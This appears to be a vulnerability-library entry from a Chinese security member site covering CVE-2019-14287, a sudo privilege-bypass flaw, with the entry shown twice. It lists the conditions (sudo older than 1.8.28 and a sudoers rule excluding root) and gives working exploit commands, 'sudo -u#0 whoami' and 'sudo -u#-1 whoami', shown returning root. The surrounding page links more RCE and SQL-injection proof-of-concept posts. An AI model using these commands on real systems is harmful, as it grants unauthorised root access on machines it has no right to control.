CVE-2019-14287_Sudo權限繞過漏洞

060

# CVE-2019-14287 Sudo權限繞過漏洞
=== Info ===

[https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions]

==== 利用要求 ====

  • sudo版本低於v1.8.28
  • /etc/sudoers 配置要求如下(要求一組特定權限,不一定完全是下面的樣子)

    • ==== 示例 ====

     ALL=(ALL:!root) NOPASSWD: ALL

    === EXP ===

    sudo -u#0 whoami
root

    === Info ===
    [https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions]
    ==== 利用要求 ====

  • sudo版本低於v1.8.28
  • /etc/sudoers 配置要求如下(要求一組特定權限,不一定完全是下面的樣子)

    • ==== 示例 ====

     ALL=(ALL:!root) NOPASSWD: ALL

    === EXP ===

    sudo -u#-1 whoami
root
    © 版权声明
    文章版权归作者所有,未经允许请勿转载。
    THE END
    漏洞库
    喜欢就支持一下吧
    点赞0赞赏 分享
    棉花糖的头像-棉花糖会员站糖心会员
    会员必看手册(1.8.6版本 25.12.1更新)-棉花糖会员站
    会员必看手册(1.8.6版本 25.12.1更新)
    会员必看手册(1.8.6版本 25.12.1更新)
    2025年12月1日 3.6W+
    mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
    mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
    mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
    2025年7月3日 1.4W+
    独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
    独家!超强代码审计工具上线!免费会员等你来嫖!
    独家!超强代码审计工具上线!免费会员等你来嫖!
    2024年12月17日 8532
    2025 hw 有poc的漏洞集合-棉花糖会员站
    2025 hw 有poc的漏洞集合
    2025 hw 有poc的漏洞集合
    2025年7月31日 6167
    技术文章投稿兑换会员规则-棉花糖会员站
    技术文章投稿兑换会员规则
    技术文章投稿兑换会员规则
    2024年3月25日 4552
    王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
    王老师src真正的完整版(49个学生分享视频版本)
    王老师src真正的完整版(49个学生分享视频版本)
    2024年6月8日 3706
    相关推荐
    2025 hw 有poc的漏洞集合-棉花糖会员站
    2025 hw 有poc的漏洞集合
    2025 hw 有poc的漏洞集合
    2025年7月31日 6167
    金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
    金蝶EAS autoLogin.jsp远程代码执行
    金蝶EAS autoLogin.jsp远程代码执行
    2025年7月4日 2399
    百度网盘Windows客户端存在远程命令执行-棉花糖会员站
    百度网盘Windows客户端存在远程命令执行
    百度网盘Windows客户端存在远程命令执行
    2025年9月4日 2275
    大华 evo-runs/v1.0/receive RCE-棉花糖会员站
    大华 evo-runs/v1.0/receive RCE
    大华 evo-runs/v1.0/receive RCE
    2025年7月11日 1952
    wps 远程代码执行 rce-棉花糖会员站
    wps 远程代码执行 rce
    wps 远程代码执行 rce
    2025年7月18日 1791
    爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
    爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
    爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
    2025年7月4日 1684
    评论 抢沙发

    请登录后发表评论

      请登录后查看评论内容

    作者
    用户封面
    棉花糖的头像-棉花糖会员站糖心会员
    CVE-2025-55182 dify 无条件rce
    会员手册版本更新(恢复md5解密功能)
    天地伟业Easy7 queryUserbyDesc 存在SQL注入
    XWiki Platform 文件读取 (CVE-2025-55749)
    安全渗透测试报告模板.doc
    普华科技PowerPms ForgotPassword 存在sql注入
    最近一周热门文章

    1会员必看手册(1.8.6版本 25.12.1更新)

    棉花糖的头像-棉花糖会员站糖心会员2025年12月1日
    3.6W+

    2会员手册版本更新(恢复md5解密功能)

    棉花糖的头像-棉花糖会员站糖心会员2025年12月5日
    804

    3普华科技PowerPms ForgotPassword 存在sql注入

    棉花糖的头像-棉花糖会员站糖心会员2025年12月3日
    9999752

    4无境靶场练习:win11通关vulntarget-b

    ll_12345的头像-棉花糖会员站糖心会员2025年12月1日
    733

    5XWiki Platform 文件读取 (CVE-2025-55749)

    棉花糖的头像-棉花糖会员站糖心会员2025年12月4日
    9999701

    6CVE-2025-55182 dify 无条件rce

    棉花糖的头像-棉花糖会员站糖心会员2025年12月5日
    700
    标签云
    龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密